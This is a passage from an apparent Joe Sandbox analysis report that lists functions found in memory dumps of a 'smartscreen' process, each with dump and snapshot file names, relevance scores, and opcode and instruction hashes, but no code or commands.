                                                                                                                            • Opcode Fuzzy Hash: f1f0e9c5c294dc963b74c563e6e835bd2cd4c2e0e269ef1be7e25f7921405ea5
                                                                                                                            • Instruction Fuzzy Hash: 70316872A0DA4D8FE768EB58C8657F933A1FB99310F0502BBD049C72D2DD386D468781
                                                                                                                            Function 00007FFD9B890C25 Relevance: .1, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 406a39e170d61da9d071532e4292c4a2dd8542e2062fdfdc5038358dd4029bfd
                                                                                                                            • Instruction ID: 3185c19d5a2fcdf066da4e14d948b34a5b4652c6dae85d83284009525842f2d6
                                                                                                                            • Opcode Fuzzy Hash: 406a39e170d61da9d071532e4292c4a2dd8542e2062fdfdc5038358dd4029bfd
                                                                                                                            • Instruction Fuzzy Hash: 4D310832B1E25D8BEB26ABA89C651EC7F60EF45724F0541F7D0588B1D3D93826868781
                                                                                                                            Function 00007FFD9B890998 Relevance: .1, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7cb0aac9418fc5e3bf9718af8de6dd503233290a81d0b38d1c30d584b3f9ced9
                                                                                                                            • Instruction ID: 0bef9e07bdf7d3718da94027fce83029472bb5b1664877513f966a1702d5446e
                                                                                                                            • Opcode Fuzzy Hash: 7cb0aac9418fc5e3bf9718af8de6dd503233290a81d0b38d1c30d584b3f9ced9
                                                                                                                            • Instruction Fuzzy Hash: 1221D720B1D91D4FEB98B7AC946A679B6C6EF9D351F4100BAE40EC33E6DD14AC424245
                                                                                                                            Function 00007FFD9B8C2D78 Relevance: .1, Instructions: 86COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 03c9204d6bc595f806f00c3bb79dddc4d194dd6580888b3cb15eec5efbd34a5f
                                                                                                                            • Instruction ID: 7fcfe947c6e81d666825267da67beb776fe5b11b1669687717275d901eff2f6b
                                                                                                                            • Opcode Fuzzy Hash: 03c9204d6bc595f806f00c3bb79dddc4d194dd6580888b3cb15eec5efbd34a5f
                                                                                                                            • Instruction Fuzzy Hash: A821C762B1D95E4FF799FBE898B66F46381EF58310F0501BBD50CC61E7DC2929894341
                                                                                                                            Function 00007FFD9B8911AD Relevance: .1, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 41709ce5bce71a3e205c5fae6d32f324fd77a03772d48802949dc735c49b5175
                                                                                                                            • Instruction ID: b77f3eacb948d694a1fdd457ad4b98b1d50f4f54abb42532bbb37c0fd1967787
                                                                                                                            • Opcode Fuzzy Hash: 41709ce5bce71a3e205c5fae6d32f324fd77a03772d48802949dc735c49b5175
                                                                                                                            • Instruction Fuzzy Hash: 89317130A0DA4A9FDB49EB64C864AB97BF0FF5A300B0505FBD009D71A6DA38A940CB10
                                                                                                                            Function 00007FFD9B8A7E67 Relevance: .1, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8a0000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ab21a8e69a0d643d4818fd86c05cb9a8a6ff609e5dffa8fd167ddacd9224fd20
                                                                                                                            • Instruction ID: dc9bedf66e2f1beecc89148b48210a870f54a803398a5dba8203f4c4cea421ea
                                                                                                                            • Opcode Fuzzy Hash: ab21a8e69a0d643d4818fd86c05cb9a8a6ff609e5dffa8fd167ddacd9224fd20
                                                                                                                            • Instruction Fuzzy Hash: 97214970E1A91E8FEBA4EB98C464BAD76A2EF58300F1501B5C40DD72E5DE387A81CB50
                                                                                                                            Function 00007FFD9B8A09E5 Relevance: .1, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8a0000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cf20a23bd1ba65bb1798aec2b5a928809ff8ef706022620d1bfcc571cdc0a6b8
                                                                                                                            • Instruction ID: 28930bfc3b718e7cf8b307c6ab6b1b09c96f3af4246d1d58017399730476bd04
                                                                                                                            • Opcode Fuzzy Hash: cf20a23bd1ba65bb1798aec2b5a928809ff8ef706022620d1bfcc571cdc0a6b8
                                                                                                                            • Instruction Fuzzy Hash: 5311E972B1952ACFD715BBBDF4948E833A0FF49335B4101B7D00DCA1A3DA2864818B50
                                                                                                                            Function 00007FFD9B8A09D5 Relevance: .1, Instructions: 53COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8a0000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: da0e95dff2b327c2ab1da46d2c524f0da245ec590d3f85111b448778bc8f0f2f
                                                                                                                            • Instruction ID: ec83df3c631c8c94475337fcc8690c9b4be83fdbce373a09df1bd28fa0f5098a
                                                                                                                            • Opcode Fuzzy Hash: da0e95dff2b327c2ab1da46d2c524f0da245ec590d3f85111b448778bc8f0f2f
                                                                                                                            • Instruction Fuzzy Hash: 4501D271B1861ACFD715FF6CE8958A833A0FF49335B5101B7D04ACB1A2EB38A885CB50
                                                                                                                            Function 00007FFD9B890BB5 Relevance: .1, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 44d7b605e2e272dc78823a7f8d400a393d4293fa02f73a6229ebdf4781ce42bb
                                                                                                                            • Instruction ID: 5eccbe7a2282b1673c909b939f5df60d389fd395f86899749869a94f90ccab87
                                                                                                                            • Opcode Fuzzy Hash: 44d7b605e2e272dc78823a7f8d400a393d4293fa02f73a6229ebdf4781ce42bb
                                                                                                                            • Instruction Fuzzy Hash: 5901D861A1D026CAD71A33ACF9654EC3B50DF4532DB4941F3D01D8A0E39D58648AD395
                                                                                                                            Function 00007FFD9B890C40 Relevance: .1, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7fa505ea11c0959ff60b465bd860ed53336fd62f33554f59ff4309fc6ecf56c5
                                                                                                                            • Instruction ID: 8c57689275c7ebc865757f116c071431659f5d09af5750fe2106236290723928
                                                                                                                            • Opcode Fuzzy Hash: 7fa505ea11c0959ff60b465bd860ed53336fd62f33554f59ff4309fc6ecf56c5
                                                                                                                            • Instruction Fuzzy Hash: 6111C432F1E68D8FEB12DBA8886009D7FB0EF56714F0641F7D054DB2A2D938674A8780
                                                                                                                            Function 00007FFD9B8CE2C3 Relevance: .0, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 29d64ed9dd71ef878bcefe266631541287ebe360b46910ff1afbcbe6268accda
                                                                                                                            • Instruction ID: 7a79b997960cc54b2b78a42a987f172e929c2ee4c775745fb68e7e8431418e38
                                                                                                                            • Opcode Fuzzy Hash: 29d64ed9dd71ef878bcefe266631541287ebe360b46910ff1afbcbe6268accda
                                                                                                                            • Instruction Fuzzy Hash: 15017171F0841A8BEBA4A6A8E4997FD73E1EB98312F410137D10DC3694DA28BA818780
                                                                                                                            Function 00007FFD9B890C48 Relevance: .0, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 19173cb53eea4553e79b55c5ad4a5c787908ee0d645090c2d6f13b83b86c735f
                                                                                                                            • Instruction ID: 65426e9ce2c1783a10a225f7b26692bb335ee9cc86fdc001baa51139a17d43c0
                                                                                                                            • Opcode Fuzzy Hash: 19173cb53eea4553e79b55c5ad4a5c787908ee0d645090c2d6f13b83b86c735f
                                                                                                                            • Instruction Fuzzy Hash: AE019231E1E28DDFEB16DBA4886009D7FB0EF56714F1641F7D054DB2A2D93867498780
                                                                                                                            Function 00007FFD9B8CBC80 Relevance: .0, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f3aa90f9af3cb761d1e0e9220ba83aee96cb0fc4ce31de702a52977ae143df6c
                                                                                                                            • Instruction ID: b207b7a3a90c7dac594ccdb25fc82fa98312f13ac95552c7ca8d564d89d95674
                                                                                                                            • Opcode Fuzzy Hash: f3aa90f9af3cb761d1e0e9220ba83aee96cb0fc4ce31de702a52977ae143df6c
                                                                                                                            • Instruction Fuzzy Hash: B2F05EA1B09D4E8BF798F7A844AA3F872D6EF9C311F55817BE40CC71A3DE2829814741
                                                                                                                            Function 00007FFD9B8CB4F9 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 43dddacf606fa701ccf3edf703d07b8efacf16a7cf2385178af84413afded859
                                                                                                                            • Instruction ID: 3c2e37821cbedfc82d97ce8891a66e85e029bfe32c80dfdbee09b561cbb8df95
                                                                                                                            • Opcode Fuzzy Hash: 43dddacf606fa701ccf3edf703d07b8efacf16a7cf2385178af84413afded859
                                                                                                                            • Instruction Fuzzy Hash: A3F02B217597C80FC719563D58650617FF1CBAB10234A02EBE086C72A3ED14DC468341
                                                                                                                            Function 00007FFD9B89696B Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aa850e8dd6eb3d928c2ee1ca5e975fc2bc5cf23df4da2b57f2a2100cad3d6c72
                                                                                                                            • Instruction ID: 326dc706fc868415381ed1f307b123991ff2f92edd8f29541e66c3762534b5cf
                                                                                                                            • Opcode Fuzzy Hash: aa850e8dd6eb3d928c2ee1ca5e975fc2bc5cf23df4da2b57f2a2100cad3d6c72
                                                                                                                            • Instruction Fuzzy Hash: 97F0E175908918CFDF54DF04C8A4E99B7E1FBA9355F014199D40DD7264DA34AE84CF81
                                                                                                                            Function 00007FFD9B8A42E8 Relevance: .0, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8a0000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bc515630a7086eaafa06d15d22408e18df9a0b157ffe5dd6284bf43e6aa8a120
                                                                                                                            • Instruction ID: e970002164abc1372501461e2d04845ee935d7c2a58fbe354f3dc4c30634f974
                                                                                                                            • Opcode Fuzzy Hash: bc515630a7086eaafa06d15d22408e18df9a0b157ffe5dd6284bf43e6aa8a120
                                                                                                                            • Instruction Fuzzy Hash: 28F04F71F1451E8BEB28DF84D8649BD77B1FB94311F05413ED416D3298DE746A018B80
                                                                                                                            Function 00007FFD9B8C538C Relevance: .0, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e6ffd61451ce0de1ce5eee846086b2d59cbe22b1f5419f587eb34de515328830
                                                                                                                            • Instruction ID: 8392c088235deeaf38179cae606ba6f9b19b5ca2d02a7b0732db2ec7e9e6554d
                                                                                                                            • Opcode Fuzzy Hash: e6ffd61451ce0de1ce5eee846086b2d59cbe22b1f5419f587eb34de515328830
                                                                                                                            • Instruction Fuzzy Hash: 48F03670A19A5D4BEB68AB5C98512B876E1FB5C300F1101ADE04D83196CE3469858B42
                                                                                                                            Function 00007FFD9B8CB089 Relevance: .0, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 40f0c9351577f8c14a6955ccbf7aa529d856683a9a94a029974fbae0916780ea
                                                                                                                            • Instruction ID: c78d495ef39962785f872caa60edd8272c3022b884d36b6301634040a0db2340
                                                                                                                            • Opcode Fuzzy Hash: 40f0c9351577f8c14a6955ccbf7aa529d856683a9a94a029974fbae0916780ea
                                                                                                                            • Instruction Fuzzy Hash: 0EE0DF20B05B884FC70DA62888694607BF1EFAB20238A42EBC005CB2A3ED1DDCC9C741
                                                                                                                            Function 00007FFD9B8CAFB9 Relevance: .0, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 29f62ba3fdd5701f05a63b7b1b47047bceb71c1ef84c22794db26f1e63588e7a
                                                                                                                            • Instruction ID: 4da2c06154ce0443006ca1ab6cf5dae0989bc96432b12e9e75b2f5950742064d
                                                                                                                            • Opcode Fuzzy Hash: 29f62ba3fdd5701f05a63b7b1b47047bceb71c1ef84c22794db26f1e63588e7a
                                                                                                                            • Instruction Fuzzy Hash: 1BE04820705B884FC70D662948695647BF1EFAB21278952DBC005C76A3ED1DDC89C741
                                                                                                                            Function 00007FFD9B8C84C5 Relevance: .0, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9b4818441bb047532442b5f54e6e41404568fca61e7b8d99f10e9bd805115039
                                                                                                                            • Instruction ID: 3b8f142165ef5b77a1af81350be3655b28ba9c8565a7f3eaa0dcb7a0f2f7a71f
                                                                                                                            • Opcode Fuzzy Hash: 9b4818441bb047532442b5f54e6e41404568fca61e7b8d99f10e9bd805115039
                                                                                                                            • Instruction Fuzzy Hash: 24E0CD3578A5490FD70D6B3C8C358743790DB5A11274A00B7C449CF5F3D919DD4A8341
                                                                                                                            Function 00007FFD9B8C9118 Relevance: .0, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c54187d8e39d6396b6ba8314f7904589565ed9d07b1dc47543f1979731e0bddf
                                                                                                                            • Instruction ID: 9e736dc65bd7ebbb26f3459f60a43aa08ce8e539391c0ea1c3b38c163eec5f2d
                                                                                                                            • Opcode Fuzzy Hash: c54187d8e39d6396b6ba8314f7904589565ed9d07b1dc47543f1979731e0bddf
                                                                                                                            • Instruction Fuzzy Hash: 16F05E70A0550DCBEB94EB88C8587FC73E1FB59311F1049A6C005A7290DE3A6E45CB04
                                                                                                                            Function 00007FFD9B8A0A05 Relevance: .0, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8a0000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7620f89128856dda02252b822d09ace50f5c43b9028ef09503f8d04a61299d0f
                                                                                                                            • Instruction ID: 93af9e8175fe3a65da50ab82dfc081153e65c70f9e5b4dbef2f6ba248e4d9e4e
                                                                                                                            • Opcode Fuzzy Hash: 7620f89128856dda02252b822d09ace50f5c43b9028ef09503f8d04a61299d0f
                                                                                                                            • Instruction Fuzzy Hash: E8E09A71B2945DCFD720EB6DD4D08A837F0FF4C355B9101F3D408CA162D228A5948BA1
                                                                                                                            Function 00007FFD9B8A5718 Relevance: .0, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8a0000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: be67ed34db126037345d8a2ac20c52ef1b636612b91b605e04b8578d0b83e27d
                                                                                                                            • Instruction ID: 01722cabf53a33ece6af9d9664dd1c8a9f8f48066c610dbd991d43359a4e0f0d
                                                                                                                            • Opcode Fuzzy Hash: be67ed34db126037345d8a2ac20c52ef1b636612b91b605e04b8578d0b83e27d
                                                                                                                            • Instruction Fuzzy Hash: ADD05E30B6090D4B8B0CA63D8468470B3D1E7AA2067D45278D40BC2291ED25ECC68B84
                                                                                                                            Function 00007FFD9B8CAFD0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                            Function 00007FFD9B8CB0A0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                            Function 00007FFD9B8CE459 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c98ea914d8af845fb3576e3c1fc93da5949466527be85c18a96ca3ef177ef1ec
                                                                                                                            • Instruction ID: d124eda8cafc43463c78927c4e4a521c36dd2b4326d32a82932f1e26f75cba78
                                                                                                                            • Opcode Fuzzy Hash: c98ea914d8af845fb3576e3c1fc93da5949466527be85c18a96ca3ef177ef1ec
                                                                                                                            • Instruction Fuzzy Hash: C9E0463554F3C08FCB0B9B34C8A89807F70EE1721038A42EAC049CF5B3DA2D894AC711
                                                                                                                            Function 00007FFD9B8CE4D9 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 57d911ea13d29dc5d435629ce03c87f09b0f3287ff8c98c72d8dc0918cdcf823
                                                                                                                            • Instruction ID: 06526bce6fcea88adbcfb46cdd78fd90719c0e6ba2f55f300e7ce35595577369
                                                                                                                            • Opcode Fuzzy Hash: 57d911ea13d29dc5d435629ce03c87f09b0f3287ff8c98c72d8dc0918cdcf823
                                                                                                                            • Instruction Fuzzy Hash: C6E04F6194FBC04FC71B9B3488798507F60DE1B21178A41EFC189CF5F3D5199849C701
                                                                                                                            Function 00007FFD9B894F9A Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 57be8222ba4c2beedd7fbd5c9be00369cdad668df1b32d2e97d25566a62fc264
                                                                                                                            • Instruction ID: c7a27d751ee4bb0caa009a7d9ef9fcac6cc712eaaaa197da6fa81df36c0e35d6
                                                                                                                            • Opcode Fuzzy Hash: 57be8222ba4c2beedd7fbd5c9be00369cdad668df1b32d2e97d25566a62fc264
                                                                                                                            • Instruction Fuzzy Hash: 2FE01231F1D51E8AFFF5A754C8643F966519F88300F1601B5D90EE72E5DD286F818740
                                                                                                                            Function 00007FFD9B890B92 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
